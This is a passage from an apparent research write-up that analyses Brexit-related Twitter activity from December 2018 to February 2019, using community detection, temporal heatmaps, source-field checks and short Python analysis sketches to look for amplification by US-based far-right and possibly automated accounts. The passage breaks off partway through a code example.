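The trait checks above can be expressed as simple heuristics over account metadata. Here is a minimal sketch, assuming accounts are represented as dicts with fields named after Twitter's v1.1 user object (`followers_count`, `friends_count`, `statuses_count`, `created_at`); the thresholds are illustrative assumptions, not the exact values used in this research.

```python
# Illustrative heuristics over account metadata; thresholds are assumptions.
from datetime import datetime, timezone

def suspicious_traits(account, retweet_ratio):
    """Return a list of trait names that flag this account for closer inspection."""
    traits = []
    age_days = (datetime.now(timezone.utc) - account["created_at"]).days or 1
    # High tweet volume: hundreds of tweets per day on average
    if account["statuses_count"] / age_days > 100:
        traits.append("high_volume")
    # Young account with a large following
    if age_days < 30 and account["followers_count"] > 10_000:
        traits.append("young_with_large_following")
    # Follower and friend counts within 10% of each other
    f, fr = account["followers_count"], account["friends_count"]
    if max(f, fr) > 0 and abs(f - fr) / max(f, fr) < 0.1:
        traits.append("similar_follower_friend_counts")
    # Follows far more accounts than follow it back
    if fr > 1000 and f < fr / 10:
        traits.append("follow_heavy")
    # Almost exclusively retweets
    if retweet_ratio > 0.99:
        traits.append("mostly_retweets")
    return traits
```

As stressed above, a non-empty result is a lead for manual review, not a verdict of automation.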

During the first few weeks of our research, we focused on building up an understanding of the trends and topology of conversations around the Brexit topic. We created a simple tool designed to collect counts and interactions from the previous 24 hours’ worth of data, and present the results in an easily readable format. This analysis included:

  • counts of how many times each user tweeted
  • counts of how many times each user retweeted another user (amplifiers)
  • counts of how many times each user was retweeted by another user (influencers)
  • counts of hashtags seen
  • counts of URLs shared
  • counts of words seen in tweet text
  • a map of interactions between users
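
The daily summarisation tool boils down to a handful of counters over the day's tweets. The sketch below assumes each tweet has been pre-parsed into a simplified dict (field names loosely follow Twitter's v1.1 tweet object); it is an illustration of the approach, not the tool itself.

```python
# Summarise 24 hours of pre-parsed tweets into the counts listed above.
from collections import Counter

def summarise(tweets):
    tweeters, amplifiers, influencers = Counter(), Counter(), Counter()
    hashtags, urls, interactions = Counter(), Counter(), []
    for t in tweets:
        user = t["user"]
        tweeters[user] += 1                       # how many times each user tweeted
        if t.get("retweeted_user"):
            amplifiers[user] += 1                 # user retweeted someone (amplifier)
            influencers[t["retweeted_user"]] += 1 # someone was retweeted (influencer)
            interactions.append((user, t["retweeted_user"]))
        for tag in t.get("hashtags", []):
            hashtags[tag.lower()] += 1
        for url in t.get("urls", []):
            urls[url] += 1
        for mention in t.get("mentions", []):
            interactions.append((user, mention))
    return {"tweeters": tweeters, "amplifiers": amplifiers,
            "influencers": influencers, "hashtags": hashtags,
            "urls": urls, "interactions": interactions}
```

The `interactions` edge list produced here is what feeds the graph analysis described next.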

By mapping the interactions between users (users interact when they retweet, mention, or reply to each other), a node-edge graph representation of observed conversations can be built. Here’s a simple representation of what that looks like:

Lines connecting users in the diagram above represent interactions between those users. Communities are groups of nodes within a network that are more densely connected to one another than to other nodes, and can be discovered using community detection algorithms. To visualize the topology of conversation spaces, we used a graph analysis tool called Gephi, which uses the Louvain Method for community detection. For programmatic community detection purposes, we used the “multilevel” algorithm that is part of the python-igraph package (which is very similar to the algorithm used in Gephi). We often used graph analysis and visualization techniques during our research, since they were able to fairly accurately partition conversations between large numbers of accounts. As an example of the accuracy of these tools, the illustration below is a graph visualization created using about 24 hours’ worth of data collected around December 4, 2018.
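
With python-igraph, the partitioning step is essentially `Graph.TupleList(edges).community_multilevel()`. As a dependency-free illustration of the same idea (partitioning an interaction graph into densely connected groups), here is a simple label-propagation pass over an edge list. Note this is a stand-in for illustration, not the Louvain-style algorithm the research actually used.

```python
# Label propagation: a simple community-detection stand-in for illustration.
from collections import Counter, defaultdict

def label_propagation(edges, rounds=10):
    """Assign each node a community label by repeatedly adopting the most
    common label among its neighbours."""
    neighbours = defaultdict(set)
    for a, b in edges:
        neighbours[a].add(b)
        neighbours[b].add(a)
    labels = {n: n for n in neighbours}   # start: every node is its own community
    for _ in range(rounds):
        changed = False
        for node in sorted(neighbours):   # fixed order keeps the sketch deterministic
            counts = Counter(labels[n] for n in neighbours[node])
            best = max(counts.items(), key=lambda kv: (kv[1], str(kv[0])))[0]
            if labels[node] != best:
                labels[node] = best
                changed = True
        if not changed:
            break
    communities = defaultdict(set)
    for node, label in labels.items():
        communities[label].add(node)
    return list(communities.values())
```

Run on two disjoint triangles of retweet interactions, this correctly recovers two communities.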

Names with a larger font indicate Twitter accounts that are mentioned more often. It can be noted from the above illustration that conversations related to pro-Brexit (leave) topics are clustered at the top (in orange) and conversations related to anti-Brexit (remain) topics are clustered at the bottom (in blue). The green cluster represents conversations related to Labour, and the purple cluster contains conversations about Scotland. People familiar with the Twitter users in this visualization will understand how accurately this methodology managed to separate out each political viewpoint. Visualizations like these illustrate that separate groups of users discuss opposing topics, with very little interaction between the two groups. Highly polarized issues, such as the Brexit debate (and many political topics around the world) usually generate graph visualizations that look like the above.

December 11: #franceprotests hashtag

On December 11, 2018, we observed the #franceprotests hashtag trending in our data (something we had not previously seen). Isolating all tweets from 24 hours’ worth of previously collected data, we found 56 separate tweets that included the #franceprotests hashtag. We mapped interactions between these tweets and the users that interacted with them, resulting in this visualization:

From the above visualization, we can clearly observe a large number of users interacting with a single tweet. This particular tweet (id: 1069955399917350912) was responsible for a majority of the occurrences of the #franceprotests hashtag on that day. This is the tweet:

The reason this tweet showed up in our data was because of the presence of the #BREXIT hashtag. From this 24 hours’ worth of collected data, we isolated a list of 1047 users that retweeted the above tweet. Interactions between these users from across the 24-hour period looked like this:

Of note in the above visualization are accounts such as @Keithbird59Bird (which retweeted pro-leave content at high volume across our entire dataset), @stephenhawes2 (a pro-leave account that exhibits potentially suspicious activity patterns), @SteveMcGill52 (an account that tweets pro-leave, anti-muslim, and US-related right wing content at high volume). The @lvnancy account that published the original tweet is a US-based alt-right account with over 50,000 followers.

At the time of writing, 23 of these 1047 accounts (2.2%) had been suspended by Twitter.

We performed a Twitter history search for “#franceprotests” in order to determine which accounts had been sharing this hashtag. The search captured roughly 5,800 tweets published by 3,617 accounts (retweets are not included in historical searches). Searching back historically allowed us to determine that the current wave of #franceprotests tweets started to pick up momentum around November 28, 2018. In addition to the #franceprotests hashtag, this group of users also published tweets with hashtags related to the yellow vests movement (#yellowvest, #yellowjackets, #giletsjaunes), and to US right-wing topics (#MAGA, #qanon, #wwg1wga). Interactions between the accounts found in that search look like this:

Some of the accounts in this group are quite suspicious looking. For instance, @tagaloglang is an account that claims to be themed towards learning the Tagalog language. The pinned tweet at the top of @tagaloglang’s timeline makes the account appear in-theme when the page loads:

However, scroll down, and you’ll notice that the account frequently publishes political content.

Another odd account is @HallyuWebsite – a Korean-themed account about Kpop. Here’s what the account looks like when you visit it:

Again, this is just a front. Scroll down and you will see plenty of political content.

Both @tagaloglang and @HallyuWebsite look like accounts that might be owned by a “Twitter marketing” service that sells retweets.

The 5,800 tweets captured in this search had accumulated a total of 53,087 retweets by mid-February 2019. Here are a few of the tweets that received the most retweets:

At the time of writing, 66 of the 3,617 accounts (1.83%) identified as historically sharing this hashtag had been suspended.

Throughout our research, we observed many English-language accounts participating in activism related to the French protests, often in conjunction with UK, US, and other far-right themes. We would imagine that a separate research thread devoted to the study of far-right activism around the French protests would likely expose plenty of additional suspicious activity.

December 20: suspicious pro-leave amplification

During our time spent studying the day-to-day user interactions, we became familiar with the names of accounts that most often tweeted, and of those that were most often retweeted. On December 20, 2018 we noticed a few accounts that weren’t normally highly retweeted that made it onto our “top 50” list. We isolated the interactions between these accounts, and the accounts that retweeted them, and produced the following visualization:

As illustrated above, several separate groups of accounts participated in the amplification of a small number of tweets from brexiteer30, jackbmontgomery, unitynewsnet and stop_the_eu. Here is a visualization of tweets from those accounts, and the users who interacted with them:

5,876 accounts participated in the amplification captured on December 20, 2018. In order to discover what other accounts these 5,876 accounts were amplifying, we collected the last 200 tweets from each of the accounts, and mapped all interactions found, generating this graph:
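
Collecting the last 200 tweets per account can be done with a standard API client (e.g. tweepy's `api.user_timeline(screen_name=..., count=200)`). The mapping step itself is a pure function over the collected timelines; the sketch below emits one (source, target) edge per retweet, reply, or mention, using field names from Twitter's v1.1 tweet object. It is an illustrative reconstruction of the step described above, not the exact script used.

```python
# Given one account's recent tweets (v1.1-style dicts), emit interaction edges.
def interactions_from_timeline(screen_name, tweets):
    edges = []
    for t in tweets:
        rt = t.get("retweeted_status")
        if rt:  # retweet: edge to the original tweet's author
            edges.append((screen_name, rt["user"]["screen_name"]))
        if t.get("in_reply_to_screen_name"):  # reply edge
            edges.append((screen_name, t["in_reply_to_screen_name"]))
        for m in t.get("entities", {}).get("user_mentions", []):  # mention edges
            edges.append((screen_name, m["screen_name"]))
    return edges
```

Concatenating the edges from all 5,876 timelines yields the node-edge graph visualized below.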

Zooming in on this, we can see that the yellow cluster at the bottom contains US-based “alt-right” Twitter personalities (such as Education4Libs, and MrWyattEarpLA – an account that is now suspended), and US-based non-authoritative news accounts (such as INewsNet).

The large blue center cluster contains many EU-based right-wing accounts (such as Stop_The_EU, darrengrimes_, and BasedPoland), and non-authoritative news sources (such as UnityNewsNet, V_of_Europe). It also contains AmyMek, a radical racist US Twitter personality with over 200,000 followers.

The orange cluster at the top contains interactions with pro-remain accounts. Although we weren’t expecting to see any interactions of this nature, they were most likely introduced by accounts in the dataset that retweet content from both sides of the debate (such as Brexit-themed tweet aggregators).

Many of the 5,876 accounts that participated in the December 20, 2018 amplification contained #MAGA (Make America Great Again hashtag commonly used by the alt-right), had US cities and states set as their locations, or identified as American in one way or another. At the time of writing, 79 of these 5,876 accounts (1.34%) had been suspended by Twitter.

February 12: non-authoritative news accounts

The presence of interactions with a number of non-authoritative, pro-leave news sources that are supportive of far-right activist Tommy Robinson (such as UnityNewsNet, PoliticalUK, and PoliticaLite) in this data led us to explore the phenomenon a little further. We ran analysis over our entire collected dataset in order to discover which accounts were interacting with, and sharing links to these sources. The data reveals that some users retweeted the accounts associated with these news sources, others shared links directly, and some retweeted content that included those links. Using our collected data, we were able to build up a picture of how these links were being shared between early December and mid-February. The script we ran looked for interactions with the following accounts: “UnityNewsNet”, “AltNewsMedia”, “UK_ElectionNews”, “LivewireNewsUK”, “Newsflash_UK”, “PoliticsUK1”, “Politicaluk”, “politicalite”. It also performed string searches on any URLs embedded in tweets for the following: “unitynewsnet”, “politicalite”, “altnewsmedia”, “www-news”, “patriotnewsflash”, “puknews”.
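
The core of that script is a straightforward match against the account list and the URL substrings. Here is a minimal sketch, assuming tweets have been pre-parsed into dicts carrying the screen names they interact with and their expanded URLs (field names are our own, for illustration).

```python
# Flag tweets that interact with the listed accounts or share matching URLs.
ACCOUNTS = {"unitynewsnet", "altnewsmedia", "uk_electionnews", "livewirenewsuk",
            "newsflash_uk", "politicsuk1", "politicaluk", "politicalite"}
URL_SUBSTRINGS = ["unitynewsnet", "politicalite", "altnewsmedia",
                  "www-news", "patriotnewsflash", "puknews"]

def matches(tweet):
    """tweet: dict with 'interacted_with' (screen names) and 'urls' (expanded URLs)."""
    if any(name.lower() in ACCOUNTS for name in tweet.get("interacted_with", [])):
        return True
    return any(sub in url.lower()
               for url in tweet.get("urls", [])
               for sub in URL_SUBSTRINGS)
```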

Overall, we discovered that 7,233 accounts had either shared (or retweeted) links to these news sites, or retweeted their associated Twitter accounts. A total of 15,337 retweets were found in the dataset. The UnityNewsNet Twitter account was the most popular news source present in our dataset. It received 8,119 retweets from a total of 4,185 unique users. In second place was the UK_ElectionNews account with 1,293 retweets from 1,182 unique users, and in third place was politicalite with 494 retweets from 351 unique users.

A total of 9,193 tweets were found in the dataset that shared URLs matching the string searches mentioned above. Again, Unity News Network was the most popular – URLs matching “unitynewsnet” were tweeted a total of 5,542 times by 2,928 unique users. Politicalite came in second – URLs matching “politicalite” were tweeted a total of 3,300 times by 2,197 unique users. In third place was Newsflash_UK – URLs matching “patriotnewsflash” were tweeted a total of 239 times by 65 unique users. Here is a graph visualization of all the activity that took place between the beginning of December 2018 and mid-February 2019:

Names that appear larger in the above visualization are account names that were retweeted more often. We can see more names here than the originally queried accounts because many links to these sites were shared by users retweeting other accounts that shared a link. Here’s a closer zoom-in:

At the time of writing, 130 of the 7,233 accounts (1.79%) identified to be sharing content related to these non-authoritative new sources had been suspended by Twitter.

The figures and illustrations shown above were obtained from a dataset of tweets that matched the term “brexit”. This particular analysis, unfortunately, didn’t give us full visibility into all activity around these “non-authoritative news” accounts and the websites associated with them that happened on Twitter between early December 2018 and mid-February 2019. In order to explore this phenomenon further, we performed historical Twitter searches for each of the account names in question (collecting data from between December 4, 2018 and February 12, 2019). This allowed us to examine tweets and interactions that weren’t captured using the search term “brexit”. Historical Twitter searches only return tweets from the accounts themselves, and tweets where the accounts were mentioned. Unfortunately, no retweets are returned by a search of this kind.

The combined dataset (over all 7 searches) included 30,846 tweets and 12,026 different users.

Combining the data from historical searches against all seven account names, we were able to map interactions between each news account and users that mentioned it. Here’s what it looked like:

Here’s a zoomed-in view of the graph around politicalite and altnewsmedia:

Note the presence of @prisonplanet (Paul Joseph Watson) and @jgoddard230616 (James Goddard, the star of several recent “yellow vests” harassment videos), amongst other highly-mentioned far-right personalities.

Also of interest is the set of users coloured in purple in the following visualization:

The users in the purple cluster were found from the data we collected using a Twitter search for “unitynewsnet”. With the exception of V_of_Europe, each of these accounts is mentioned exactly the same number of times (522 times) by other users in that dataset. This particular phenomenon appears to have been created by a rather long conversation between those 40-odd accounts between January 14 and 16, 2019. The conversation started with a question about where to find “yellow vest”-related news. Since mentions are always inherited between replies, and both V_of_Europe and UnityNewsNet were mentioned in the first tweet in the thread, this explains why these tweets are present in this dataset. Using temporal analysis techniques (explained below), we were able to ascertain that a majority of the involved accounts pause, or tweet at reduced volume, between 06:00 and 12:00 UK time, which is indicative of night time in US time zones. In fact, examining these accounts manually reveals that they are mostly US-based. The V_of_Europe account is a non-authoritative news account (Voice of Europe) with over 200,000 followers.

This interesting finding illustrates that a suspicious-looking trend or spike may sometimes present itself when data is viewed from a certain angle, only for further inspection to show the phenomenon is largely benign.

At the time of writing, 159 of the 12,026 accounts (1.32%) discovered above had been suspended by Twitter.

Temporal Analysis

Temporal analysis methods can be useful for determining whether a Twitter account might be publishing tweets using automation. This section describes techniques, the results of which are included later in this document. Here are some common temporal analysis methods:

  • Gather a histogram of counts of time intervals between the publishing of tweets. Numerous high counts of similar time intervals between tweets can indicate robotic behaviour.
  • A “heatmap” of the time of day, and day of the week that an account tweets can be gathered. The heatmap can then be examined (either by eye, or programmatically) for anomalous patterns. Using this technique, it is easy to identify accounts that tweet non-stop, with no breaks. If this is the case, it is possible that some (or all) of the tweets are being published via automation.
  • A heatmap analysis may also illustrate that certain accounts publish tweets en-masse at specific times of the day, and remain dormant for many hours in between. This behavior can also be an indicator that an account is automated – for instance, this is somewhat common with marketing automation or news feeds.
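
Both methods above reduce to simple counting over a list of tweet timestamps. Here is a minimal, dependency-free sketch; timestamps are assumed to be `datetime` objects parsed from each tweet's `created_at` field, and the 5-second bucket width is an illustrative choice.

```python
# Interarrival histogram and hour-of-day/day-of-week heatmap over tweet timestamps.
from collections import Counter
from datetime import datetime, timezone

def interarrival_histogram(timestamps, bucket_seconds=5):
    """Count gaps between consecutive tweets, bucketed to the given interval."""
    ts = sorted(timestamps)
    gaps = ((b - a).total_seconds() for a, b in zip(ts, ts[1:]))
    return Counter(int(g // bucket_seconds) * bucket_seconds for g in gaps)

def activity_heatmap(timestamps):
    """Counter keyed by (weekday, hour): a 7x24 grid of tweet counts."""
    return Counter((t.weekday(), t.hour) for t in timestamps)
```

A spike at one small interarrival bucket, or a heatmap with activity in every cell (no sleep), are the robotic signatures described above.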

Here are some interesting examples found from the dataset. Note that these examples are intended as illustration, and not as indications that the associated accounts are bots.

The stephenhawes2 account tweets in short bursts at specific times of the day, with no activity at any other time. The precise time windows during which this user tweets (18:00-20:59 and 00:00-01:59) look odd. This account retweets a great deal of far-right content.

Here are the time deltas (in seconds) observed between the account’s last 3200 tweets. You’ll notice that a majority of the tweets are published between 5 and 15 seconds apart.

The JimNola42035005 account, which amplifies a lot of pro-leave content, pauses tweeting between 08:00 UTC and 13:00 UTC. This is indicative of a user not residing in the UK’s time zone.

The interarrival pattern for this account shows a strong tendency for multiple tweets to be published in rapid succession (5-30 seconds apart).

The tobytortoise1 account tweets at very high volume, and almost always shows up at or near the top of the most active users tweeting about Brexit. This is a pro-leave account. Here’s the heatmap for that account. Note the bursts of activity exceeding 100 tweets in an hour:

Here is the interarrival pattern for that account:

The walshr108 account, which publishes pro-leave content, appears to pause roughly around UK night-time hours. However, the interarrival pattern of this account raises suspicion.

Over 350 of walshr108’s last 3200 tweets were published less than one second apart.

Unconventional source fields

Each published tweet includes a “source” field that is set by the agent that was used to publish that tweet. For instance, tweets published from the web interface have their source field set to “Twitter Web Client”. Tweets published from an iPhone have a source field set to “Twitter for iPhone”. And so on. Tweets can be published from a variety of sources, including services that allow tweets to be scheduled for publishing (for instance “IFTTT”), services that allow users to track follows and unfollows (such as “Unfollowspy”), apps within web pages, and social media aggregators. Twitter sources can be roughly grouped into:

  • Sources associated with manual tweeting (such as “Twitter Web Client”, “Twitter for iPhone”)
  • Sources associated with known automation services (such as “IFTTT”)
  • Sources that don’t match either of the above
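
This rough triage can be expressed as a simple lookup. The category sets below are small illustrative samples (the document's own examples plus a few widely known client names); the real analysis required hand-verifying each distinct source string.

```python
# Rough triage of a tweet's "source" field into the three groups above.
# The membership sets are illustrative samples, not an authoritative list.
MANUAL_SOURCES = {"Twitter Web Client", "Twitter for iPhone",
                  "Twitter for Android", "Twitter for iPad", "Twitter Lite"}
KNOWN_AUTOMATION = {"IFTTT", "Unfollowspy", "Hootsuite", "Buffer"}

def classify_source(source):
    if source in MANUAL_SOURCES:
        return "manual"
    if source in KNOWN_AUTOMATION:
        return "known_automation"
    return "needs_review"  # everything else must be examined by hand
```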

While services that allow the automation of tweeting (such as “IFTTT”) can be used for malicious purposes, they can also be used for legitimate purposes (such as brand marketing, news feeds, and aggregators). Malicious actors sometimes shy away from such services for two reasons:

  • It is easy for researchers to identify tweet automation by examining source fields
  • Sophisticated tools exist that allow bot herders to publish tweets from multiple accounts without the use of the API, and which can spoof their user agent to match legitimate sources (often “Twitter for Android”)

Despite the availability of professional bot tools, there are still some malicious actors that use Twitter’s API and attempt to disguise what they’re doing. One way to do this is to create an app whose source field is a string similar to that of a known source (e.g. “Twitter for  Android” <- note that this string has two spaces between the words “for” and “Android”). Another way is to replace ASCII characters with non-ASCII characters (e.g. “Оwly” <- the “O” in this string is non-ASCII). API-based apps can also “hide” by using source strings that look like legitimate product names – there are a plethora of legitimate apps available that all have similar-looking names: Twuffer, Twibble, Twitterfy, Tweepsmap, Tweetsmap. It’s easy enough to create a similarly absurd, nonsensical word, and hide amongst all of these.
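
The first two tricks (extra whitespace, non-ASCII look-alikes) are mechanically detectable. The sketch below flags source strings that imitate a known client name; the `KNOWN` set is an illustrative sample, and the 0.6 similarity cutoff is an assumption.

```python
# Flag source strings that imitate a known client via whitespace padding
# or non-ASCII look-alike characters. KNOWN is an illustrative sample.
import difflib

KNOWN = {"Twitter for Android", "Twitter Web Client", "Twitter for iPhone", "Owly"}

def looks_spoofed(source):
    if source in KNOWN:
        return False
    collapsed = " ".join(source.split())  # fold repeated whitespace
    if collapsed in KNOWN:
        return True                       # e.g. "Twitter for  Android"
    if any(ord(ch) > 127 for ch in source):
        # Non-ASCII look-alike: is the ASCII remainder nearly a known name?
        skeleton = "".join(ch for ch in source if ord(ch) < 128)
        return bool(difflib.get_close_matches(skeleton, KNOWN, cutoff=0.6))
    return False
```

This catches the two spoofs quoted above while leaving genuinely novel (if oddly named) apps for manual review.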

Over 6000 unique source strings were found in the dataset. There is no definitive list of “legitimate” Twitter sources available, and hence each and every one of the unique source strings found must be examined manually in order to build a list of acceptable versus unacceptable sources. This process involves either searching for the source string, locating a website, and reading it, or visiting the account that is using the unknown source string and manually checking the “legitimacy” of that account. At the time of writing, we had managed to hand-verify about 150 source strings that belonged to Twitter clients, known automation services, and custom apps used by legitimate services (such as news sites and aggregators). We found roughly 2 million tweets across the entire dataset that were published with source strings that we had yet to hand-verify. These tweets were published by just under 17,000 accounts.

As mentioned previously, since there are dozens of legitimate services that allow Twitter to be automated, it isn’t easy to programmatically identify whether these automation sources are being used for malicious purposes. Each use of such a service found in the dataset would need to be examined by hand (or by the use of custom filtering logic for each subset of examples). This is simply not feasible. As such, using Twitter’s source field to determine whether suspicious, malicious, or automated behaviour is occurring is a complex endeavour, and one that is outside of the scope of the research described in this document.

Comparison of remain and leave-centric communities

We collected retweet interactions over our entire dataset and created a large node-edge graph. The reason why we only captured retweet interactions in this case was based on the assumption that if users wish to extend the reach of a particular tweet, they’d more likely retweet it than reply to it, or simply mention an account name. While the process of “liking” a tweet also seems to amplify a tweet’s visibility (via Twitter’s underlying recommendation mechanisms), instances of users “liking” tweets are, unfortunately, not available via Twitter’s streaming API.

The graph of all retweet activity across the entire collection period contained 219,328 nodes (unique Twitter accounts) and 1,184,262 edges (each edge was one or more observed retweet). Using python-igraph’s multilevel community detection algorithm, we partitioned the graph into communities. A total of 8,881 communities were discovered during this process. We performed string searches on the members of each identified community for high-profile accounts we’d seen engaging in leave and remain conversations throughout the research period, and were able to discover a leave-centric community containing 39,961 users and a remain-centric community containing 52,205 users. We then separately queried our full dataset with each list of users to isolate all relevant data (tweets, interactions, hashtags, and urls). Below are the findings from that analysis work.
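
The community-selection step described above can be sketched as a small function: given the partition produced by community detection, pick the community that best overlaps a list of known seed accounts. The seed names and data shapes here are illustrative.

```python
# Select the community containing known high-profile seed accounts.
def find_community(communities, seeds):
    """communities: list of sets of screen names; return the community sharing
    the most members with the seed list, or None if there is no overlap."""
    seeds = {s.lower() for s in seeds}
    scored = [(len({m.lower() for m in c} & seeds), c) for c in communities]
    best_overlap, best = max(scored, key=lambda x: x[0])
    return best if best_overlap else None
```

Running this once with leave-centric seeds and once with remain-centric seeds yields the two communities analyzed below.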

Leave community

The leave-centric community comprised 39,961 users. They published 1.1 million unique tweets, and a total of 4.3 million retweets across the dataset.

  • 2779 (6.95%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 278 (0.70%) accounts retweeted over 2000 times across the entire dataset, for a total of 880,620 retweets (20.5%). Of these, temporal analysis suggests that 33 of the accounts exhibited potentially suspicious behavior (11.9%) and 14 accounts tweeted during non-UK time schedules.
  • At the time of writing, 133 of these accounts (0.33%) had been suspended by Twitter.

Remain community

The remain-centric community comprised 52,205 users. They published 1.7 million unique tweets, and a total of 6.2 million retweets across the dataset.

  • 3413 (6.54%) accounts that were seen at least 100 times in the dataset retweeted 95% (or more) of the time.
  • 436 (0.84%) accounts retweeted over 2000 times across the entire dataset, for a total of 1,471,515 retweets (23.7%). Of these, temporal analysis suggests that 41 of the accounts exhibited potentially suspicious behavior (9.4%) and 18 accounts tweeted during non-UK time schedules.
  • At the time of writing, 54 of these accounts (0.10%) had been suspended by Twitter.

Findings

Although we were initially suspicious of high-volume retweeters, the presence of these in roughly equal proportions in both groups led us to believe that this sort of behaviour might be somewhat standard on Twitter. The top remain-centric group’s high-volume retweeters published more often than top leave-centric high-volume retweeters. We observed that many of the top retweeters from the remain-centric group tended to tweet a lot about Labour.

The top retweeted account in the leave-centric group received substantially more retweets than the next most highly retweeted account. This was not the case for the remain-centric group.

  • Top hashtags used by the remain-centric group included: #peoplesvote, #stopbrexit, #eu, #fbpe, #remain, #labour, #finalsay, and #revokea50. All of the top-50 hashtags in this group were themed around anti-brexit sentiment, around politicians, or around political events that happened in the UK during the data collection period (#specialplaceinhell, #theresamay, #corbyn, #donaldtusk, #newsnight).
  • Top hashtags used by the leave-centric group included: #eu, #nodeal, #standup4brexit, #ukip, #leavemeansleave, #projectfear and #leave. Notable other hashtags on the top-50 list for this group were other “no-deal” hashtags (#gowto, #wto, #letsgowto, #nodealnoproblem, #wtobrexit), hashtags referring to protests in France and the adoption of high-vis vest by far-right UK protesters (#giletsjaunes, #yellowvestsuk, #yellowvestuk) and the hashtag #trump.
  • Both groups heavily advertised links to UK Parliament online petitions relevant to the outcome of brexit. The remain group advertised links to petitions requesting a second referendum, whilst the leave group advertised links to petitions demanding the UK leave the EU, regardless of the outcome of negotiations.
  • From the users we identified as having retweeted more than 95% of the time, we found 62 accounts from the leave-centric group that were clearly American right-wing personas. These accounts associated with #Trump and #MAGA, amplified US political content, and interacted with US-based alt-right personalities (in addition to amplifying Brexit-related content). The description fields of these accounts usually included words such as “Patriot”, “Christian”, “NRA”, and “Israel”. Many of these accounts had their locations set to a state or city in the US. The most common locations set for these accounts were: Texas, Florida, California, New York, and North Carolina. We found no evidence of equivalent accounts in the remain-centric group.
  • Following on from our previous discovery, using a simple string search, we found 1294 accounts in the leave-centric group and 12 accounts in the remain-centric group that had #MAGA in either their name or description fields. We manually visited a random selection of these accounts to verify that they were alt-right personas. A few of the #MAGA accounts identified in the remain group were not what we would consider alt-right – they showed up in the results due to the presence of negative comments about MAGA culture in their account description fields.
  • As detailed earlier, some of the accounts in the leave-centric group interacted with non-authoritative, far-right “news” accounts, or shared links with sites associated with these accounts (such as UnityNewsNet, BreakingNLive, LibertyDefenders, INewsNet, Voice of Europe, ZNEWSNET, PoliticalUK, and PoliticaLite.) We didn’t find an analogous activity in the remain-centric group.

We created a few plots of the number of times a hashtag was observed during each hour of the day. For a baseline reference, here’s what that plot looks like for the #brexit hashtag:
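
The series behind these plots is just a 24-bin count of hashtag occurrences per hour of day. A minimal sketch, assuming tweets have been pre-parsed into (timestamp, hashtag-list) pairs:

```python
# Count occurrences of a hashtag per hour of day, yielding 24 plottable bins.
from collections import Counter
from datetime import datetime

def hourly_counts(tweets, hashtag):
    """tweets: iterable of (datetime, list-of-hashtags) pairs."""
    counts = Counter()
    target = hashtag.lower()
    for ts, tags in tweets:
        if target in (t.lower() for t in tags):
            counts[ts.hour] += 1
    return [counts.get(h, 0) for h in range(24)]
```

Plotting the returned list (e.g. as a bar chart) reproduces the day-shape comparisons discussed below.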

You can clearly see a lull in activity during night-time hours in the UK. Compare the above baseline with the plot for the #yellowvestuk hashtag:

This clearly shows that the #yellowvestuk hashtag is most frequently used in the late evening UK time (mid-afternoon US time). Here is the plot for #yellowvestsuk:

Note that this hashtag follows a different pattern to #yellowvestuk, and is used most often around lunchtime in the UK. Both of these graphs show a lull in activity during night-time hours in the UK, indicating that the accounts pushing these hashtags most likely belong to people living in the UK, and that possibly different groups are promoting these two competing hashtags.

Final thoughts

It is very difficult to determine whether a Twitter account is a bot, or acting as part of a coordinated astroturfing campaign, simply by performing queries with the standard API. Twitter’s programmatic interface imposes many limitations on what can be done when analyzing an account. For instance, by default, only the last 3200 tweets can be collected from any given account, and Twitter restricts how often such a query can be run. Most of the potentially suspicious accounts identified during this research have published tens, or even hundreds of thousands of tweets over their lifetimes, most of which are now inaccessible.

Since Twitter’s API doesn’t support observing when a user “likes” a tweet, and has limited support for querying which accounts retweeted or replied to a tweet, it is impossible to track all actions that occur on the platform. Nowadays, a user’s Twitter timeline contains a series of recommendations (for instance, a tweet may appear on a user’s timeline because “user x that you follow liked this tweet”). The timeline is no longer just a sequential list of tweets published by accounts a user follows. Hence it is important to understand which actions might increase the likelihood that a tweet appears on a user’s timeline, is recommended to a user (via notifications), or appears in a curated list when a search is performed.

We do know that Twitter’s systems track an internal representation of the quality of every account, and give more engagement weight to higher quality accounts. Although it is likely that many of the potentially suspicious accounts identified during our research have low quality scores, it is still possible that their collective actions may incorrectly modify the sentiment of certain viewpoints and opinions, or cause content to be shown to users when it otherwise shouldn’t have.

From analysis of the “leave” and “remain” communities obtained by graph analysis, it seems clear to us that the remain-centric group looks quite organic, whilst the leave-centric group is being bolstered by non-UK far-right Twitter accounts. Leave users also utilize a number of “non-authoritative” news sources to spread their messages. Given that we also observed a subset of leave accounts performing amplification of political content related to French and US politics, we wouldn’t be surprised if coordinated astroturfing activity is being used to amplify pro-Brexit sentiment. Finding such a phenomenon would require additional work – most of the tweets published by this group likely weren’t captured by our stream-search for the word “brexit”. It’s clear that an internationally-coordinated collective of far-right activists is promoting content on Twitter (and likely other social networks) in order to steer discussions and amplify sentiment and opinion towards their own goals, Brexit being one of them.

During the course of our research, we created over 90 separate Jupyter notebooks and custom analysis tools. We estimate that roughly 90% of the approaches we tried ended in dead ends. Despite all of this analysis work, we didn’t find the “next big” political disinformation botnet. We did, however, find many phenomena that were both interesting and odd.



Why Social Network Analysis Is Important

I got into social network analysis purely for nerdy reasons – I wanted to write some code in my free time, and Python modules that wrap Twitter’s API (such as tweepy) allowed me to do simple things with just a few lines of code. I started off with toy tasks (like mapping the time of day that @realDonaldTrump tweets) and then moved on to creating tools to fetch and process streaming data, which I used to visualize trends during some recent elections.

The more I work on these analyses, the more I’ve come to realize that there are layers upon layers of insights that can be derived from the data. There’s data hidden inside data – and there are many angles you can view it from, all of which highlight different phenomena. Social network data is like a living organism that changes from moment to moment.

Perhaps some pictures will help explain this better. Here’s a visualization of conversations about Brexit that happened between the 3rd and 4th of December, 2018. Each dot is a user, and each line represents a reply, mention, or retweet.

Tweets supportive of the idea that the UK should leave the EU are concentrated in the orange-colored community at the top. Tweets supportive of the UK remaining in the EU are in blue. The green nodes represent conversations about UK’s Labour party, and the purple nodes reflect conversations about Scotland. Names of accounts that were mentioned more often have a larger font.
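The underlying structure of these pictures can be sketched without any graph library: each user is a node and each reply, mention, or retweet adds a weighted edge, with mention counts driving the font size. The interactions below are invented for illustration.

```python
from collections import Counter

# Build a weighted interaction graph from (source, target) pairs.
def build_graph(interactions):
    edges = Counter()     # (source, target) -> interaction count
    mentions = Counter()  # target -> times mentioned/replied to/retweeted
    for source, target in interactions:
        edges[(source, target)] += 1
        mentions[target] += 1
    return edges, mentions

interactions = [
    ("user_a", "user_b"),  # user_a retweets user_b
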